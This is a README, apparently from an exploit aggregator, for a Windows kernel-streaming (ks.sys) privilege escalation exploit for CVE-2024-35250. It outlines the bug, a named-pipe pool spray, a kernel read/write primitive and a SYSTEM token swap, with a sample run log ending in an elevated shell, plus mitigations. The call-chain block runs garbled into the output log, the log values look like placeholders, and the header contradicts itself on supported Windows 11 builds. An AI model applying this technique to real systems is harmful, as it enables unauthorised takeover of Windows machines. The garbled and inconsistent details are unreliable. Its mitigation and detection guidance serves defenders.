Share 
## https://sploitus.com/exploit?id=1DE5E169-6880-5017-80AB-E62E4EA0A3D9
# CVE-2024-35250

Local privilege escalation via untrusted pointer dereference in Windows Kernel Streaming driver (`ks.sys`).
Data-only exploit โ€” bypasses Hypervisor-protected Code Integrity (HVCI).

## Summary

| Field | Detail |
|---|---|
| CVE | CVE-2024-35250 |
| Component | ks.sys (Kernel Streaming) |
| Bug Class | Untrusted Pointer Dereference |
| Impact | EoP to NT AUTHORITY\SYSTEM |
| HVCI | Bypassed โ€” no code execution in kernel |
| Patch | KB5039212 (June 2024) |
| Targets | Windows 10 20H1+ / Windows 11 21H2-23H2 |

## Vulnerability

`ks!KspPropertyHandler` dispatches topology-level property requests through
`KspProcessPropertyNode`. The `NodeId` field from user-supplied `KSP_NODE`
structure is used as an index into an internal automation table array
without bounds validation:

```
NtDeviceIoControlFile
  ks!CKSFilter::DispatchDeviceIoControl
    ks!KspPropertyHandler
      ks!KspProcessPropertyNode
        *(automationTable + NodeId * stride)    eop
[~] hvci bypass via data-only attack
[+] os: 10.0.19045
[+] offsets: pid=0x440 links=0x448 token=0x4b8
[+] device: \\?\hdaudio#func_01&ven_10ec...
[+] device handle: 0x00000000000000f4
[~] calibrating r/w primitive...
[+] kernel base: 0xfffff80140000000
[~] spraying named pipes for pool layout...
[+] sprayed 5000 pipe pairs
[~] poking hole at index 2500...
[~] scanning for kernel pointer via oob read...
[+] found kernel ptr at node 3 offset 2: 0xffffa70500000000
[+] pipe object kernel addr: 0xffffa70500000000
[+] r/w primitive initialized (mode 1)
[+] current eprocess: 0xffffa705d90f4080
[+] kernel read pid: 1234 (expected: 1234)
[+] system eprocess: 0xffffa70500004080
[+] system token: 0xffffa70512345673
[+] token after swap: 0xffffa70512345670
[+] token swap successful
[+] escalation complete
[+] elevated shell spawned (pid: 5678)

press enter to exit...
```

## Project Structure

```
CVE-2024-35250/
โ”œโ”€โ”€ CVE-2024-35250.sln
โ”œโ”€โ”€ CVE-2024-35250.vcxproj
โ”œโ”€โ”€ CVE-2024-35250.vcxproj.filters
โ”œโ”€โ”€ README.md
โ”œโ”€โ”€ LICENSE
โ”œโ”€โ”€ .gitignore
โ”œโ”€โ”€ include/
โ”‚   โ”œโ”€โ”€ common.h         - types, log macros, nt api typedefs
โ”‚   โ”œโ”€โ”€ offsets.h        - per-build eprocess field offsets
โ”‚   โ”œโ”€โ”€ device.h         - ks device enumeration
โ”‚   โ”œโ”€โ”€ leak.h           - kernel address leaks
โ”‚   โ”œโ”€โ”€ krw.h            - r/w primitive context
โ”‚   โ”œโ”€โ”€ token.h          - token swap + shell spawn
โ”‚   โ””โ”€โ”€ exploit.h        - top-level entry
โ””โ”€โ”€ src/
    โ”œโ”€โ”€ main.c           - entry point
    โ”œโ”€โ”€ device.c         - setupapi device open
    โ”œโ”€โ”€ leak.c           - NtQuerySystemInformation leaks
    โ”œโ”€โ”€ krw.c            - vulnerability trigger + pool spray + r/w
    โ”œโ”€โ”€ token.c          - eprocess walk + token overwrite
    โ””โ”€โ”€ exploit.c        - orchestration
```

## Supported Builds

| OS | Build | Status |
|---|---|---|
| Windows 10 20H1 | 19041 | Supported |
| Windows 10 20H2 | 19042 | Supported |
| Windows 10 21H1 | 19043 | Supported |
| Windows 10 21H2 | 19044 | Supported |
| Windows 10 22H2 | 19045 | Supported |
| Windows 11 21H2 | 22000 | Supported |
| Windows 11 22H2 | 22621 | Supported |
| Windows 11 23H2 | 22631 | Supported |
| Windows 11 24H2 | 26100 | Supported |

Offsets are resolved automatically at runtime via `RtlGetVersion`.

## Notes

- Requires a KS filter device with topology nodes (audio devices work)
- Pool spray success depends on system memory pressure and timing
- The exploit uses named pipe attributes for pool feng shui
- Run as a regular (non-admin) user to demonstrate privilege escalation
- May require multiple attempts due to pool layout randomization

## Mitigation

| Action | Detail |
|---|---|
| **Patch** | Install KB5039212 (June 2024) or later |
| **Detection** | Monitor `IOCTL_KS_PROPERTY` with `KSPROPERTY_TYPE_TOPOLOGY` flag |
| **EDR** | Alert on token integrity changes via EtwTi kernel callbacks |
| **Hardening** | Restrict user access to KS device interfaces via DACL |

## References

- [Microsoft Advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-35250)
- [KB5039212 Patch Notes](https://support.microsoft.com/help/5039212)
- [DEVCORE โ€” Pwn2Own Vancouver 2024](https://devco.re/)
- [varwara/CVE-2024-35250](https://github.com/varwara/CVE-2024-35250)

## Disclaimer

This project is provided for authorized security research and educational
purposes only. Do not use against systems without explicit written permission.
The author assumes no liability for any misuse or damage caused by this software.

## License

[MIT](LICENSE)